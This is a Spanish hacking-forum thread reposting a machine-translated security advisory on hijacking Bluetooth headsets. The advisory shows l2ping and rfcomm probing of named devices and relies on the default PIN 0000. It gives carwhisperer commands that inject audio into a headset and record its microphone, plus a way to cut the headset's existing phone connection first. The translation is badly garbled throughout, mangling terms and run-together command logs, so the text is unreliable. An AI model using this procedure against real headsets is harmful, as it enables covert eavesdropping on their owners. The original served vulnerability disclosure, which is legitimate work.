elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Comunicaciones
| |-+  Dispositivos Móviles (PDA's, Smartphones, Tablets)
| | |-+  Hacking Mobile
| | | |-+  ¿Secuestro de los receptores de cabeza de Bluetooth para beneficio?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Secuestro de los receptores de cabeza de Bluetooth para beneficio?  (Leído 4,239 veces)
#Borracho.-


Desconectado Desconectado

Mensajes: 1.052


Negative!


Ver Perfil
¿Secuestro de los receptores de cabeza de Bluetooth para beneficio?
« en: 19 Diciembre 2005, 15:14 pm »

el kf[at]digitalmunition[dot]com

http://www.digitalmunition.com/HijackHeadSet.txt





hace algunos años cuando trabajé para SNOSoft a mi socio de negocio ' Simon ' era uno de esos individuos que oscilaron fuera de un receptor de cabeza de Bluetooth apenas que hablé alrededor cada vez con él en su teléfono de la célula.  Detesté ambos él y esos otros individuos que usted vio caminar alrededor de alameda con esa ***** del crecimiento del oído de Cardassian que colgaba del lado de su cabeza.  ¡Maldije su receptor de cabeza y los de los otros bastardos que vi en la alameda y en los caminos!  ¡Juré que un día su receptor de cabeza y todos los los suyos sentirían mi cólera!  En esfuerzos de satisfacer mi sed para Bluetooth I hiera encima de comprar varios receptores de cabeza al azar.  http://www.digitalmunition.com/HeadSets.jpg

00:03:89:AA:Ä:AC M2500 por el receptor de cabeza estéreo
00:07:A4:21:ED:27 Jabra BT800
00:07:A4:79:05:3B Motorola HS820 de Plantronics
00:07:A4:95:28:E2 Jabra BT110
00:15:0E:91:19:73 Anycom por defecto ningunos de estos dispositivos son discoverable. 
Para ' vea ' cada receptor de cabeza que debe ser colocado en el ' apareamiento de modo '.  Aunque el dispositivo no es discoverable usted puede manejar descubrir un receptor de cabeza vía las técnicas del estilo de Ollie Whitehouse/de RedFang o a través de una presa de las peticiones del eco de L2CAP.  Si usted lo hace, en algunos casos usted puede poder escuchar detras de las puertas encendido o arrogar propaganda en el dueño del receptor de cabeza.  Los varios receptores de cabeza pueden o pueden no responder a las peticiones de L2CAP o de RFCOMM dependiendo de su estado actual de la conexión.  Algunos receptores de cabeza por ejemplo continúan manteniendo peticiones aunque ' están conectados actualmente ' con un teléfono de la célula.  Esto puede obviamente hacerlos fáciles encontrar.  Un l2ping a un dispositivo que esté en el estado ' conectado ' da lugar generalmente a ' no puede conectar:  El anfitrión está abajo de '.  De los 5 receptores de cabeza que I posee mi receptor de cabeza de Anycom es el único que responde cuando ' conectó '.  silbido de bala de animosity:/home/kfinisterre # de l2ping 00:15:0E:91:19:73:  00:15:0E:91:19:73 de 00:11:B1:07:BE:A7 (tamaño 44 de los datos)...  4 octetos de la identificación 00:15:0E:91:19:73 0 octetos del tiempo 42.71ms 4 de la identificación 00:15:0E:91:19:73 1 vez 35.34ms 2 enviada, 2 recibidos, pérdida del 0% cuando los dispositivos no están conectados con un teléfono de la célula el cambio de los resultados un pedacito.  La basura a responder, algo de algunos dispositivos totalmente responde con peticiones y otras del código del PERNO con peticiones de la llave del acoplamiento.  El receptor de cabeza de Plantronics quisiera que le enviara un código del PERNO...  < Comando de HCI:  Cree La Conexión (0x01|0x0005) plen 13 > acontecimiento de HCI:  El estado del comando (0x0f) plen 4 > acontecimiento de HCI:  La petición del código del PERNO (0x16) plen 6 < comando de HCI:  Contestación Negativa De la Petición Del Código del PERNO (0x01|0x000e) plen 6 que el Jabra BT110 no responderá simplemente en todos.  animosity:/home/kfinisterre # l2ping 00:07:A4:95:28:E2 no pueden conectar:  El anfitrión está abajo del Anycom responde exactamente como hizo antes.  silbido de bala de animosity:/home/kfinisterre # de l2ping 00:15:0E:91:19:73:  00:15:0E:91:19:73 de 00:11:B1:07:BE:A7 (tamaño 44 de los datos)...  4 octetos de la identificación 00:15:0E:91:19:73 0 los octetos del tiempo 41.72ms 4 de la identificación 00:15:0E:91:19:73 1 los octetos del tiempo 34.55ms 4 de la identificación 00:15:0E:91:19:73 2 octetos del tiempo 39.32ms 4 a partir 00:15:0E:91:19:73 del tiempo 43.88ms 4 de la identificación 3 enviaron, 4 recibidos, pérdida del 0% que el Jabra BT800 rechazó simplemente la conexión.  Aunque la conexión fue rechazada.  Todavía podíamos determinarse que existió el dispositivo basado en la respuesta inválida del intercambio.  animosity:/home/kfinisterre # l2ping 00:07:A4:21:ED:27 no pueden conectar:  Intercambio inválido < comando de HCI:  Cree La Conexión (0x01|0x0005) plen 13 > acontecimiento de HCI:  El estado del comando (0x0f) plen 4 > acontecimiento de HCI:  Conecte completo (0x03) plen 11 el Motorola también rechazado pero solamente después que una petición de la llave del acoplamiento fue hecha.  ... sabemos otra vez que existe basado en la respuesta inválida del intercambio.  Saber que existe el dispositivo podría ayudar en un ataque futuro.  animosity:/home/kfinisterre # l2ping 00:07:A4:79:05:3B no pueden conectar:  Intercambio inválido < comando de HCI:  Cree La Conexión (0x01|0x0005) plen 13 > acontecimiento de HCI:  El estado del comando (0x0f) plen 4 > acontecimiento de HCI:  La petición de la llave del acoplamiento (0x17) plen 6 < comando de HCI:  Contestación Negativa De la Petición De la Llave Del Acoplamiento (0x01|0x000c) plen 6 > acontecimiento de HCI:  El comando completo (0x0e) plen 10 > acontecimiento de HCI:  Conecte completo (0x03) plen 11 puesto que conseguimos absolutamente una variedad de respuestas a la prueba de l2ping que tuvo sentido de considerar cómo las conexiones del rfcomm se resolvieron.  Sobre conectar con el Plantronics envía una petición del código del PERNO otra vez.  < Comando de HCI:  Cree La Conexión (0x01|0x0005) plen 13 > acontecimiento de HCI:  El estado del comando (0x0f) plen 4 > acontecimiento de HCI:  La petición del código del PERNO (0x16) plen 6 < comando de HCI:  Contestación Negativa De la Petición Del Código del PERNO (0x01|0x000e) plen 6 > acontecimiento de HCI:  El comando completo (0x0e) plen 10 > acontecimiento de HCI:  Conecte completo (0x03) plen 11 el Jabra BT110 como de costumbre no responde simplemente.  animosity:/home/kfinisterre # el rfcomm conectan 1 00:07:A4:95:28:E2 1 no pueden conectar el zócalo de RFCOMM:  El anfitrión es abajo de este tiempo que el Anycom pide un código del PERNO apenas como lo hizo el Plantronics.  < Comando de HCI:  Cree La Conexión (0x01|0x0005) plen 13 > acontecimiento de HCI:  El estado del comando (0x0f) plen 4 > acontecimiento de HCI:  Conecte completo (0x03) plen 11 < los datos del ACL:  las banderas 0x02 de la manija 42 dlen 12 L2CAP(s):  Conecte el req:  scid del psm 3 comando de 0x0040 < de HCI:  Escriba Los Ajustes De la Política Del Acoplamiento (0x02|0x000d) plen 4 > acontecimiento de HCI:  El comando completo (0x0e) plen 6 > acontecimiento de HCI:  El número de los paquetes terminados (0x13) plen 5 > acontecimiento de HCI:  El cambio de modo de la repetición de la exploración de la página (0x20) plen 7 > los datos del ACL:  las banderas 0x02 de la manija 42 dlen 16 L2CAP(s):  Conecte el rsp:  conexión del estado 2 del resultado 1 del scid 0x0040 del dcid 0x0040 pendiente - autorización pendiente > acontecimiento de HCI:  El cambio máximo de las ranuras (0x1b) plen 3 > acontecimiento de HCI:  La petición del código del PERNO (0x16) plen 6 < comando de HCI:  Contestación Negativa De la Petición Del Código del PERNO (0x01|0x000e) plen 6 > acontecimiento de HCI:  El comando completo (0x0e) plen 10 > los datos del ACL:  las banderas 0x02 de la manija 42 dlen 16 L2CAP(s):  Conecte el rsp:  estado del resultado 3 del scid 0x0040 del dcid 0x0000 0 conexiones rechazadas - bloque de la seguridad > acontecimiento de HCI:  Disconn completo (0x05) plen 4 que el Jabra BT800 rechaza la conexión.  No puede conectar el zócalo de RFCOMM:  Intercambio inválido < comando de HCI:  Cree La Conexión (0x01|0x0005) plen 13 > acontecimiento de HCI:  El estado del comando (0x0f) plen 4 > acontecimiento de HCI:  Conecte completo (0x03) plen 11 que el motorola también rechaza otra vez después de que una petición de la llave del acoplamiento.  No puede conectar el zócalo de RFCOMM:  Intercambio inválido < comando de HCI:  Cree La Conexión (0x01|0x0005) plen 13 > acontecimiento de HCI:  El estado del comando (0x0f) plen 4 > acontecimiento de HCI:  La petición de la llave del acoplamiento (0x17) plen 6 < comando de HCI:  Contestación Negativa De la Petición De la Llave Del Acoplamiento (0x01|0x000c) plen 6 > acontecimiento de HCI:  El comando completo (0x0e) plen 10 > acontecimiento de HCI:  Conecte completo (0x03) plen 11 obviamente que un descubrimiento interesante era que 2 de los receptores de cabeza antedichos procuraron obtener un código del PERNO de nosotros aunque no consistían en el apareamiento de modo.  Cada solo receptor de cabeza I el propios tiene un código del PERNO del defecto de 0000.  Porque estos dispositivos están incitando para entrar un número de PERNO bien conocido del defecto y no consisten en el apareamiento de modo que ponen a los dueños de estos dispositivos son riesgo de ser escuchado detras de las puertas sobre.  Ambos dispositivos que nos pidieron un código del PERNO son vulnerables a un ataque de la supervisión alejada usando el coche Whisperer http://trifinite.org/trifinite_downloads.html de Trifinite.  Bastantes los pairings múltiples de la ayuda de los dispositivos así que el dueño del teléfono pueden no tener ninguna indicación que está ocurriendo un ataque.  Usar el coche Whisperer no nos prohibe al monitor el micrófono de los receptores de cabeza en la pregunta e inyectar audio en el pedazo del oído.  animosity:/home/kfinisterre/carwhisperer-0.1 # /carwhisperer 0 ajuste de la voz de eargasm.raw/de tmp/out.raw 00:03:89:AA:Ä:AC:  ¡el canal de 0x0060 RFCOMM conectó el canal audio de SCO conectado (la manija 45, MTU 64) (inyecte la propaganda y después lea en el mic) en el caso del Anycom Bsh-100 que podemos incluso  terminar una conexión existente con un teléfono de la célula antes de que ataquemos!  ¡Funcione simplemente el coche Whisperer dos veces!  La primera conexión matará al acoplamiento al teléfono de la célula.  /carwhisperer 0 ajuste de la voz de eargasm.raw de kfinisterre@animosity:~/carwhisperer-0.1$/de tmp/out.raw 00:15:0E:91:19:73:  el canal de 0x0060 RFCOMM conectó el canal audio de SCO conectado (la manija 45, MTU 64) (deje el em saben que soy Rick James y entonces leído en el mic) las ediciones que he contorneado en este documento ocurren debido a la puesta en práctica pobre del perfil determinado de la cabeza de Bluetooth.  ¡A menos que un receptor de cabeza se haya colocado específicamente en el ' apareamiento de modo ' no debe solicitar un código del PERNO sobre la conexión de un dispositivo extranjero previamente desapareado!  Plantronics y Anycom fueron notificados sobre las ediciones antedichas sin embargo ninguna compañía realmente hecha un esfuerzo de comunicar cualquier plan para tratar los problemas.   debido al hecho de que otros vendedores pueden ser afectado yo han decidido lanzar esta información.  ¿Tan Simon tengo que preguntarle que hágale sin embargo tienen ese receptor de cabeza?  Si tan subsistencia las baterías frescas para mí...  ¡Me estoy arrastrando en ella! 



http://www.digitalmunition.com/creepin.jpg

Fuente: Digitalmunition.com


En línea

Si nos quedamos en este mundo, que no sea con hambre...
#Borracho.-


Desconectado Desconectado

Mensajes: 1.052


Negative!


Ver Perfil
Re: ¿Secuestro de los receptores de cabeza de Bluetooth para beneficio?
« Respuesta #1 en: 19 Diciembre 2005, 19:08 pm »

Si esto se impone a las normas del foro disculpen...
Salu2


En línea

Si nos quedamos en este mundo, que no sea con hambre...
Unravel
BlueHack Team
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.016



Ver Perfil
Re: ¿Secuestro de los receptores de cabeza de Bluetooth para beneficio?
« Respuesta #2 en: 20 Diciembre 2005, 01:58 am »

Pues la verdad,

No sé si borrarlo o moverlo a wargames para que alguien lo descifre.

Traducción online, todo junto, ufff, parece un monólogo interior de James Joyce.

A ver si esta semana que viene, con tiempo, sacamos algo en claro.
En línea

"La verdad es un ácido corrosivo que salpica casi siempre al que la maneja". Santiago Ramón y Cajal.
#Borracho.-


Desconectado Desconectado

Mensajes: 1.052


Negative!


Ver Perfil
Re: ¿Secuestro de los receptores de cabeza de Bluetooth para beneficio?
« Respuesta #3 en: 20 Diciembre 2005, 11:45 am »

No hay problema...
En línea

Si nos quedamos en este mundo, que no sea con hambre...
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines